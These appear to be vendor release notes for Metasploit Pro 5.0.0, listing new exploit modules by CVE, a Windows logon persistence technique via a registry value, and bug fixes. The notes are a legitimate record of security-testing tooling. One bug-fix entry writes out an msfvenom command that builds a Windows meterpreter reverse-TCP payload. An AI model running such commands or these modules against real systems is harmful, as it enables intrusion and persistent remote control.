Metasploit Pro Version 5.0.0-2026040201 Release Notes
Software release date: April 2, 2026 | Release notes published: April 3, 2026
New Module Content
- #20478 - Adds a new auxiliary module that exploits CVE-2026-23767, an unauthenticated ESC/POS command vulnerability in networked Epson-compatible printers. The vulnerability allows an attacker to send crafted commands over the network to inject custom ESC/POS print commands, which are used in various receipt printers.
- #20719 - Adds a new Metasploit exploit module for FreePBX filestore authenticated command injection (CVE-2025-64328) with automatic vulnerable-version detection and full documentation, and renames the XorcomCompletePbx HTTP mixin to CompletePBX updating affected modules accordingly.
- #20835 - Adds a module for CVE-2025-12548, an unauthenticated RCE in the Eclipse Che machine-exec service. The vulnerability allows attackers to connect over WebSocket on port 3333 and execute commands via JSON-RPC without authentication. This affects Red Hat OpenShift DevSpaces environments.
- #21023 - Adds a new
exploits/multi/http/os_cmd_execmodule that targets generic HTTP command execution vulnerabilities where user-supplied input is directly passed to system execution functions via an HTTP request. - #21029 - Adds a new exploit module for CVE-2025-50286, an authenticated RCE vulnerability in Grav CMS 1.1.x–1.7.x with Admin Plugin 1.2.x–1.10.x. The module exploits the Direct Install feature to upload a malicious plugin ZIP and execute an arbitrary PHP payload as the web server user.
- #21032 - Adds a new Windows persistence module that abuses the
HKCU\Environment\UserInitMprLogonScriptregistry value to execute a payload at user logon. - #21033 - Adds exploit module for CVE-2023-2868, a command injection vulnerability in Barracuda Email Security Gateway (ESG) appliances. Filenames in TAR attachments are passed to shell commands without sanitization, allowing RCE via backtick injection.
- #21069 - Adds an exploit module for CVE-2026-28289, an unauthenticated remote code execution vulnerability in FreeScout versions prior to or equal to 1.8.206.
- #21076 - Adds an exploit module for CVE-2026-29058, an unauthenticated OS command injection in AVideo Encoder’s getImage.php endpoint.
- #21172 - Adds HTTP and HTTPS fetch payloads for 32-bit Windows targets.
Enhancements and Features
- #20730 - Modifies the ldap_query module to skip querying the SACL (System Access Control List) on security descriptors by default. This behavior is now controlled by a new option, LDAP::QuerySacl. This change is necessary when using a non-privileged user to query security descriptors via LDAP; otherwise, querying the SACL will cause the entire query to be blocked, resulting in no security descriptors being returned.
- #20997 - Adds a new
OptTimedeltadatastore option type. It enables module authors to specify a time duration and users to set it with a human-friendly syntax. - #20999 - Removes the legacy windows/local/persistence module, which has been superseded by the modernized windows/persistence/registry module. A moved_from alias ensures that existing scripts and workflows referencing the old module path are automatically redirected to the new one with a deprecation warning.
- #21048 - Updates the SOCKS proxy module to use the new fiber-based relay manager internally. The result is a reduction in code and improved performance.
- #21049 - Updates post modules to use an API that will expand multiple environment variables when set within the
WritableDiroption. - #21090 - Updates multiple modules to make use of
report_service(). - #21097 - Updates
auxiliary/scanner/ftp/anonymous.rbto report the FTP service regardless of anonymous being enabled. - #21214 - Adds additional validation to
db_importbefore attempting to import values.
Bugs Fixed
- #20960 - Adds a
DHCPINTERFACEoption to the DHCP server mixin, allowing modules that start that server to specify a particular interface to bind to. - #20967 - Fixes an issue that prevents successful authentication relay from Ruby SMB Client and
smbclient. These clients are now compatible withMsf::Exploit::Remote::SMB::RelayServer. - #21004 - Fixes a bug in the
#normalize_keymethod provided by the Windows Registry mixin. The result is correct behavior when using shell sessions to check for keys with trailing \ characters. - #21024 - Fixes a bug in the JSON-RPC
msfrpcdfunctionality that incorrectly required SSL certificates to be present even when disabled withmsfrpcd -S. - #21025 - Fixes a crash when calling the HTTP cookie jar with non-string values.
- #21028 - Fixes a crash when using the
reload_allcommand when no module is present. - #21073 - Fixes a bug where running
exploit/multi/handlerwith a reverse HTTP/HTTPS payload multiple times on the same port caused cleanup issues. - #21081 - Fixes a crash when using
windows/execwith non-ASCII characters. - #21138 - Fixes a bug that stopped the
auxiliary/server/dhcpmodule from running as a background job whenRHOSTShad been set. - #21139 - Fixes a bug in the
ldap_esc_vulnerable_cert_findermodule that was preventing authentication from working when making a WinRM connection. - #21148 - Fixes a bug where setting
VERBOSElogging as false globally would still cause verbose logging to occur. - #21169 - Fixes a bug that was preventing Mach-O binaries from being identified due to a Ruby string encoding compatibility problem.
- #21173 - Fixes a crash when attempting to generate a
vbspayload withmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=44 -f vbs. - #21174 - Fixes a bug when parsing msfconsole’s
-xflag when additional semicolons are present that are not meant to separate commands. i.e.msfconsole -x 'set option_name "a;b"'. - #21199 - Fixes a crash in
auxiliary/scanner/http/wp_perfect_survey_sqliwhen run against invalid or unreachable targets. - #21207 - Fixes a warning when running the
linux/gather/enum_protectionsmodule. - #21208 - Fixes multiple warnings in modules that reported notes incorrectly.
Offline Update
Metasploit Framework and Pro Installers